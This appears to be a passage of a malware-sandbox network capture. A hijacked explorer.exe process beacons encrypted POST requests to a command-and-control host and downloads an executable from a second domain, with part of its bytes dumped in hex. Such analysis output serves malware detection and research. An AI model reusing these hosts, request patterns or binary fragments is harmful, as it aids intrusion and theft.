                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  7192.168.2.549700211.171.233.12680C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:46.940022945 CEST114OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lgjjdpyb.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 216
                  Host: gayworld.at
                  Oct 10, 2022 23:20:46.940022945 CEST114OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 7c 0d e4 e4
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vu|f{FkMbKZ vk;bxdY4SMzP?,R, N^.Yz zb$H'J@
                  Oct 10, 2022 23:20:47.920043945 CEST115INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:47 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.549701211.171.233.12680C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:48.233144999 CEST116OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ymxif.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 237
                  Host: gayworld.at
                  Oct 10, 2022 23:20:48.233159065 CEST116OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4f 50 de 9f
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vuOPQMzlsJ6R=~i_(8h>8SF6"\a4dGt"_1|=N:F5fQ,;tFl
                  Oct 10, 2022 23:20:49.232600927 CEST117INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:48 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.549702175.120.254.980C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Oct 10, 2022 23:20:49.530167103 CEST118OUTPOST /tmp/ HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://wjwailraw.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 275
                  Host: gayworld.at
                  Oct 10, 2022 23:20:49.530184031 CEST118OUTData Raw: 3b 6e 51 13 f7 c3 6c 22 df a9 b3 77 73 70 09 cc 78 0a cb 97 6a 71 e3 6a 7d 7d 7b 92 32 c2 cf 6f 93 5d c0 2c 02 6b 2b 1c ea ec 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 64 40 fd 8b
                  Data Ascii: ;nQl"wspxjqj}}{2o],k+?*$`7C[zqNA -[k,vud@UB["HFR qfv)djaFA]\7?FPUN<!|3ONl.e<aSt6T8coEbw4fGFLHz
                  Oct 10, 2022 23:20:50.714776039 CEST119INHTTP/1.0 404 Not Found
                  Date: Mon, 10 Oct 2022 21:20:50 GMT
                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                  X-Powered-By: PHP/5.6.40
                  Content-Length: 331
                  Connection: close
                  Content-Type: text/html; charset=utf-8
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.54971187.250.250.50443C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  2022-10-10 21:21:22 UTC0OUTGET /d/aS1IzKYGKL0Ctw HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: disk.yandex.ru
                  2022-10-10 21:21:22 UTC0INHTTP/1.1 200 OK
                  Connection: Close
                  Content-Length: 10538
                  Content-Security-Policy: default-src 'none'; script-src yastatic.net 'nonce-KX+0hQL3oDs++2xLIm8h+Q==' 'unsafe-inline' mc.yandex.ru mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz https://frontend.vh.yandex.ru https://yastatic.net an.yandex.ru storage.mds.yandex.net; style-src yastatic.net 'unsafe-inline'; font-src yastatic.net; object-src yastatic.net 'self'; img-src yastatic.net 'self' data: https://avatars.mds.yandex.net storage.mds.yandex.net https://yapic.yandex.net downloader.disk.yandex.ru downloader.disk.yandex.net yandex.ru mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ru mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz mc.admetrica.ru strm.yandex.ru an.yandex.ru *.weborama.fr view.adjust.com view.atdmt.com comscore.com s1.countby.com bl1.datamind.ru *.doubleclick.net secure-it.imrworldwide.com lamoda25.ru omirussia.ru amch.questionmarket.com r24-tech.com yandex.dsp.redfog.ru yandex-bidder.rutarget.ru eu-propulsor.sociomantic.com tns.ru gemius.pl adfox.ru pixel.adlooxtracking.com avatars-fast.yandex.net favicon.yandex.net banners.adfox.ru content.adfox.ru ads6.adfox.ru yastat.net avatars.mds.yandex.net *.tns-counter.ru *.verify.yandex.ru verify.yandex.ru ads.adfox.ru bs.serving-sys.com bs.serving-sys.ru ad.adriver.ru wcm.solution.weborama.fr wcm-ru.frontend.weborama.fr ad.doubleclick.net rgi.io track.rutarget.ru ssl.hurra.com amc.yandex.ru gdeby.hit.gemius.pl tps.doubleverify.com pixel.adsafeprotected.com impression.appsflyer.com pixel.adlooxtracking.ru; connect-src 'self' yandex.ru mail.yandex.ru api.passport.yandex.ru yandexmetrica.com:* mc.webvisor.com mc.webvisor.org mc.yandex.com mc.yandex.by mc.yandex.com.tr mc.yandex.kz mc.yandex.ru mc.yandex.ua mc.yandex.az mc.yandex.co.il mc.yandex.com.am mc.yandex.com.ge mc.yandex.ee mc.yandex.fr mc.yandex.kg mc.yandex.lt mc.yandex.lv mc.yandex.md mc.yandex.tj mc.yandex.tm mc.yandex.uz mc.admetrica.ru strm.yandex.ru log.strm.yandex.ru streaming.disk.yandex.net csp.yandex.net blob: an.yandex.ru *.strm.yandex.net verify.yandex.ru *.verify.yandex.ru yandex.st yastatic.net matchid.adfox.yandex.ru adfox.yandex.ru ads.adfox.ru ads6.adfox.ru jstracer.yandex.ru yastat.net tps.doubleverify.com pixel.adsafeprotected.com amc.yandex.ru; frame-src yastatic.net 'self' yandex-disk: blob: downloader.disk.yandex.ru downloader.disk.yandex.net *.storage.yandex.net *.disk.yandex.net mc.yandex.ru mc.yandex.md https://frontend.vh.yandex.ru https://yastatic.net; media-src downloader.disk.yandex.ru downloader.disk.yandex.net *.storage.yandex.net *.disk.yandex.net blob: data: *.yandex.net strm.yandex.ru *.strm.yandex.ru yastat.net; child-src blob: mc.yandex.ru; frame-ancestors webvisor.com *.webvisor.com http://webvisor.com http://*.webvisor.com; report-uri https://csp.yandex.net/csp?from=disk-public&project=disk-public&yandex_login=&yandexuid=7822820781665436882;
                  Content-Type: text/html; charset=utf-8
                  Date: Mon, 10 Oct 2022 21:21:22 GMT
                  ETag: W/"292a-rvlHBnmkF8sIvadX6wpTryjUgjQ"
                  Set-Cookie: yandexuid=7822820781665436882; Max-Age=315360000; Domain=.yandex.ru; Path=/; Expires=Thu, 07 Oct 2032 21:21:22 GMT; Secure
                  Set-Cookie: _yasc=cWi7jspuEBmaVyNUoLz8h5oI+0/+hXawu4SpJg2wdOlT5Q==; domain=.yandex.ru; path=/; expires=Wed, 09-Nov-2022 21:21:22 GMT; secure
                  Set-Cookie: i=8giXSIK595ibKwJwJ+ycfuQ6bXMOAcgpQyRV//BofUnBJl45OsTp2Spv6xU1+RuYfBzP0wcsj9Rb2PoOpIsNr8jG2+Q=; Expires=Wed, 09-Oct-2024 21:21:22 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
                  Vary: Accept-Encoding
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  X-Robots-Tag: noindex, noarchive, nofollow
                  2022-10-10 21:21:22 UTC4INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e d0 a1 d0 ba d0 b0 d1 87 d0 b0 d0 b9 d1 82 d0 b5 20 d1 84 d0 b0 d0 b9 d0 bb 0a d0 b8 d0 bb d0 b8 20 d0 be d0 b1 d0 bd d0 be d0 b2 d0 b8 d1 82 d0 b5 20 d0 b1 d1 80 d0 b0 d1 83 d0 b7 d0 b5 d1 80 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c
                  Data Ascii: <!DOCTYPE html><html lang="ru"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title> </title><styl
                  2022-10-10 21:21:22 UTC8INData Raw: 57 47 5a 77 4f 70 56 55 52 57 42 4b 67 4a 56 42 4b 6f 49 56 42 47 6f 49 74 44 38 43 50 77 58 79 33 31 4c 6e 6f 4e 34 77 45 77 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 3d 29 20 6e 6f 2d 72 65 70 65 61 74 7d 2e 74 69 74 6c 65 2d 77 72 61 70 70 65 72 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 2d 77 72 61 70 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 37 36 70 78 7d 2e 6d 6f 62 69 6c 65 20 2e 74 69 74 6c 65 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 36 70 78 7d 2e 74 69 70 2d 77 72 61 70 70 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 32 70 78 3b
                  Data Ascii: WGZwOpVURWBKgJVBKoIVBGoItD8CPwXy31LnoN4wEwAAAAASUVORK5CYII=) no-repeat}.title-wrapper{white-space:pre-wrap;font-size:63px;line-height:76px}.mobile .title-wrapper{margin-top:10px;font-size:30px;line-height:36px}.tip-wrapper{font-size:23px;line-height:32px;


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.5497305.135.247.111443C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  2022-10-10 21:21:47 UTC14OUTGET /upload/index.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Host: thepokeway.nl
                  2022-10-10 21:21:47 UTC14INHTTP/1.1 200 OK
                  Date: Mon, 10 Oct 2022 21:21:47 GMT
                  Server: Apache
                  Content-Description: File Transfer
                  Content-Disposition: attachment; filename=c08d5be9.exe
                  Content-Transfer-Encoding: binary
                  Expires: 0
                  Cache-Control: must-revalidate
                  Pragma: public
                  Vary: Accept-Encoding
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: application/octet-stream
                  2022-10-10 21:21:47 UTC14INData Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 eb 0f c6 32 8a 61 95 32 8a 61 95 32 8a 61 95 2c d8 f4 95 13 8a 61 95 2c d8 e2 95 bc 8a 61 95 2c d8 e5 95 1c 8a 61 95 15 4c 1a 95 37 8a 61 95 32 8a 60 95 be 8a 61 95 2c d8 eb 95 33 8a 61 95 2c d8 f5 95 33 8a 61 95 2c d8 f0 95 33 8a 61 95 52 69 63 68 32 8a 61 95 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d3 3c 2f 62 00 00 00 00 00
                  Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$v2a2a2a,a,a,aL7a2`a,3a,3a,3aRich2aPEL</b
                  2022-10-10 21:21:47 UTC22INData Raw: 00 00 00 00 00 f0 3f 00 00 00 a8 00 a0 e9 3f 3c 82 b2 e2 d8 5b 23 3e 00 00 00 00 00 80 f0 3f 00 00 00 f0 25 1a ea 3f e5 59 3a 2f 28 41 36 3e 00 00 00 00 00 00 f1 3f 00 00 00 f8 8a 90 ea 3f 1a 84 a2 4e ea d8 32 3e 00 00 00 00 00 80 f1 3f 00 00 00 38 4f 03 eb 3f 97 72 17 e4 21 27 09 3e 00 00 00 00 00 00 f2 3f 00 00 00 b4 91 72 eb 3f f6 8c ed 38 7b 4b 1c 3e 00 00 00 00 00 80 f2 3f 00 00 00 ec 70 de eb 3f 39 95 ba 6c fe 39 24 3e 00 00 00 00 00 00 f3 3f 00 00 00 bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac ec 3f 27 5c 1b f2 7c 23 3c 3e 00 00 00 00 00 00 f4 3f 00 00 00 24 e2 0e ed 3f ce 7d b2 64 6a 88 23 3e 00 00 00 00 00 80 f4 3f 00 00 00 cc 57 6e ed 3f d7 88 13 4d 56 78 3a 3e 00 00 00 00 00 00 f5 3f 00 00 00 2c f8 ca ed 3f
                  Data Ascii: ??<[#>?%?Y:/(A6>??N2>?8O?r!'>?r?8{K>?p?9l9$>?G?aji9>?T|?'\|#<>?$?}dj#>?Wn?MVx:>?,?
                  2022-10-10 21:21:47 UTC22INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC22INData Raw: 32 30 30 30 0d 0a 88 78 00 d9 b4 0f 34 3e 00 00 00 00 00 00 f8 3f 00 00 00 70 b1 c0 ef 3f 65 64 66 bf 26 c9 2e 3e 00 00 00 00 00 80 f8 3f 00 00 00 2c 13 06 f0 3f bf 87 66 bb b0 a6 41 3e 00 00 00 00 00 00 f9 3f 00 00 00 68 bf 2a f0 3f 76 f1 07 ba d0 f6 32 3e 00 00 00 00 00 80 f9 3f 00 00 00 24 67 4e f0 3f 52 45 5c b8 0e d0 4b 3e 00 00 00 00 00 00 fa 3f 00 00 00 c4 13 71 f0 3f 27 5e e1 08 d1 49 45 3e 00 00 00 00 00 80 fa 3f 00 00 00 44 ce 92 f0 3f 9b 9f 26 61 9e c2 48 3e 00 00 00 00 00 00 fb 3f 00 00 00 4c 9f b3 f0 3f 8b 26 4b 72 1d 51 46 3e 00 00 00 00 00 80 fb 3f 00 00 00 2c 8f d3 f0 3f dd 23 2f a4 27 e8 16 3e 00 00 00 00 00 00 fc 3f 00 00 00 d8 a5 f2 f0 3f 5d 58 cd 63 02 ff 3f 3e 00 00 00 00 00 80 fc 3f 00 00 00 00 eb 10 f1 3f 08 d0 d4 ae 7d ce 1f 3e 00
                  Data Ascii: 2000x4>?p?edf&.>?,?fA>?h*?v2>?$gN?RE\K>?q?'^IE>?D?&aH>?L?&KrQF>?,?#/'>??]Xc?>??}>
                  2022-10-10 21:21:48 UTC30INData Raw: 01 01 01 01 01 01
                  Data Ascii:
                  2022-10-10 21:21:48 UTC30INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC30INData Raw: 32 30 30 30 0d 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 10 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 10 00 02 01 02 01 02 01 02 01 02 01 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC38INData Raw: ff 75 0c ff 75 08
                  Data Ascii: uu
                  2022-10-10 21:21:48 UTC38INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC38INData Raw: 32 30 30 30 0d 0a e8 2a ff ff ff 83 c4 0c 5d c3 6a 0c 68 e0 80 41 00 e8 6a 28 00 00 33 f6 89 75 e4 33 c0 8b 5d 08 3b de 0f 95 c0 3b c6 75 20 e8 69 12 00 00 c7 00 16 00 00 00 56 56 56 56 56 e8 cb fe ff ff 83 c4 14 83 c8 ff e9 cd 00 00 00 33 c0 39 75 0c 0f 95 c0 3b c6 74 d4 89 5d 08 53 e8 40 23 00 00 59 89 75 fc f6 43 0c 40 75 77 53 e8 3a 3b 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 80 01 48 00 eb 05 b9 c0 a4 41 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d 80 01 48 00 eb 05 b8 c0 a4 41 00 f6 40 24 80 74 1c e8 cf 11 00 00 c7 00 16 00 00 00 56 56 56 56 56 e8 31 fe ff ff 83 c4 14 83 4d e4 ff 39 75 e4 75 23 53 e8 d5 2a 00 00 8b f8 8d 45 10 50 56 ff 75 0c 53 e8 c2 2c 00
                  Data Ascii: 2000*]jhAj(3u3];;u iVVVVV39u;t]S@#YuC@uwS:;YttHAA$u)ttHA@$tVVVVV1M9uu#S*EPVuS,
                  2022-10-10 21:21:48 UTC46INData Raw: f0 85 f6 75 08 6a
                  Data Ascii: uj
                  2022-10-10 21:21:48 UTC46INData Raw: 0d 0a
                  Data Ascii:
